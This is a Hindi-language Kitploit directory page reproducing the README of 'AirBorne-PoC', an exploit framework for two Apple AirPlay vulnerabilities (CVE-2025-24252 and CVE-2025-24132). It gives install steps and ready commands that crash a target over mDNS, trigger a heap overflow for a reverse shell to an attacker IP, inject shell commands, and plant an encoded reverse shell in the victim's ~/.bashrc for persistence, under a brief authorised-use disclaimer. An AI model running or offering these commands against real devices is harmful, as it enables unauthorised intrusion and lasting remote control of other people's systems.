Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
AirBorne-PoC — CVE-2025-24252 और CVE-2025-24132 के लिए PoC | Kitploit
उपकरण/GitHubGitHub/ekomssavior/airborne-poc
स्थायित्व तंत्रभेद्यता विश्लेषणशोषणशेलकोडपोस्ट-शोषणकमांड एंड कंट्रोलरिमोट एक्सेस टूलपेलोड डेवलपमेंटबाइनरी शोषण
GitHubekomssavior/airborne-poc

AirBorne-PoC

CVE-2025-24252 और CVE-2025-24132 के लिए PoC

16427438 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
साझा करें

AirBorne PoC फ्रेमवर्क – Elite RCE संस्करण

CVE-2025-24252 और CVE-2025-24132 के लिए पूर्ण PoC फ्रेमवर्क
द्वारा ekomsSavior |

AirBorne एक संयुक्त proof-of-concept (PoC) फ्रेमवर्क है जो Apple की AirPlay सेवा में दो गंभीर कमजोरियों को लक्षित करता है। इसमें एक पूर्ण क्रैश ट्रिगर और एक कार्यशील रिवर्स शेल एक्सप्लॉइट शामिल है जिसमें वैकल्पिक पर्सिस्टेंस, लिसनर और कई पेलोड फॉर्मेट — सभी एक ही स्क्रिप्ट में हैं।

मूल संस्करण खोज रहे हैं?
लीगेसी संस्करण अभी भी इस रिपॉजिटरी की legacy ब्रांच में उपलब्ध है।
इसे देखने के लिए:

root@kitploit:~
git checkout legacy

कवर किए गए CVE

CVE-2025-24252 – mDNS TXT रिकॉर्ड क्रैश

  • एक दोषपूर्ण mDNS पैकेट के माध्यम से AirPlayReceiver डेमॉन में क्रैश ट्रिगर करता है
  • पोर्ट 5353 पर UDP ब्रॉडकास्ट पर काम करता है

CVE-2025-24132 – हीप ओवरफ्लो → रिवर्स शेल (RCE)

  • पोर्ट 7000 पर AirPlay की TCP सेवा में हीप ओवरफ्लो ट्रिगर करता है
  • bash, python और PowerShell रिवर्स शेल पेलोड का समर्थन करता है
  • .bashrc इंजेक्शन (Linux) का उपयोग करके वैकल्पिक पर्सिस्टेंस शामिल है

  • शुरू करना

    1. रिपॉजिटरी क्लोन करें

    root@kitploit:~
    git clone https://github.com/ekomsSavior/AirBorne-PoC.git
    cd AirBorne-PoC
    

    2. निर्भरताएँ स्थापित करें

    root@kitploit:~
    sudo apt update
    sudo apt install -y python3-scapy netcat
    

    रनटाइम वॉकथ्रू

    एकल स्क्रिप्ट airborne.py में दोनों PoC और सभी तर्क शामिल हैं:

    • --exploit का उपयोग करके एक CVE चुनें
    • --payload का उपयोग करके एक रिवर्स शेल पेलोड सेट करें
    • आपके लिए स्वचालित रूप से netcat लिसनर शुरू करता है
    • वैकल्पिक रूप से --persistent का उपयोग करके लक्ष्य पर पर्सिस्टेंस सक्षम करता है

    उपयोग उदाहरण

    mDNS पैकेट के साथ लक्ष्य को क्रैश करें (CVE-2025-24252)

    root@kitploit:~
    sudo python3 airborne.py --exploit 24252 --interface wlan0
    

    मॉनिटर मोड में एक इंटरफ़ेस की आवश्यकता है।


    हीप ओवरफ्लो → RCE लॉन्च करें (CVE-2025-24132)

    डिफ़ॉल्ट bash शेल के साथ पूर्ण एक्सप्लॉइट शुरू करें:

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
    

    इसके बजाय Python शेल चुनें:

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
    

    Linux लक्ष्यों पर वास्तविक पर्सिस्टेंस सक्षम करें:

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
    

    केवल शेल कमांड इंजेक्शन

    root@kitploit:~
    sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
    

    पेलोड विकल्प

    Payloadविवरण
    bashTCP पर डिफ़ॉल्ट bash रिवर्स शेल
    pythonsocket और pty का उपयोग कर Python-आधारित रिवर्स शेल
    powershellपूर्ण Windows PowerShell RCE पेलोड (अस्पष्टित)

    पर्सिस्टेंस मोड

    --persistent का उपयोग करते समय, स्क्रिप्ट लक्ष्य के निम्नलिखित में एन्कोडेड रिवर्स शेल पेलोड जोड़ देगी:

    root@kitploit:~
    ~/.bashrc
    

    यह सुनिश्चित करता है कि जब भी उपयोगकर्ता लॉग इन करता है या टर्मिनल खोला जाता है, तो आपको एक शेल प्राप्त होता है।


    रखरखाव नोट्स

    • रिवर्स शेल को base64 का उपयोग करके एन्कोड किया जाता है और बफर ओवरफ्लो के बाद वितरित किया जाता है
    • सभी पेलोड पोर्ट 7000 के माध्यम से भेजे जाते हैं
    • mDNS पैकेट UDP 5353 पर जाते हैं और रॉ सॉकेट अनुमति की आवश्यकता होती है
    • सुनिश्चित करें कि आपका अटैक बॉक्स IP लक्ष्य डिवाइस द्वारा पहुँचा जा सके
    • स्क्रिप्ट बुनियादी त्रुटियों को संभालती है और बंद पोर्ट पर चुपचाप विफल हो जाती है

    नैतिक अस्वीकरण

    यह प्रोजेक्ट केवल शैक्षिक, नैतिक और अधिकृत अनुसंधान के लिए है।

    • आपके पास लक्ष्य प्रणाली का परीक्षण करने के लिए स्पष्ट अनुमति होनी चाहिए।
    • आप किए गए किसी भी कार्रवाई के लिए पूरी जिम्मेदारी लेते हैं।

    सिस्टम का अनधिकृत शोषण अवैध और अनैतिक है।


    क्रेडिट

    • ekomsSavior द्वारा निर्मित
    • वास्तविक दुनिया के CVE और एक्सप्लॉइट विकास अनुसंधान से प्रेरित
    टूल डाउनलोड करें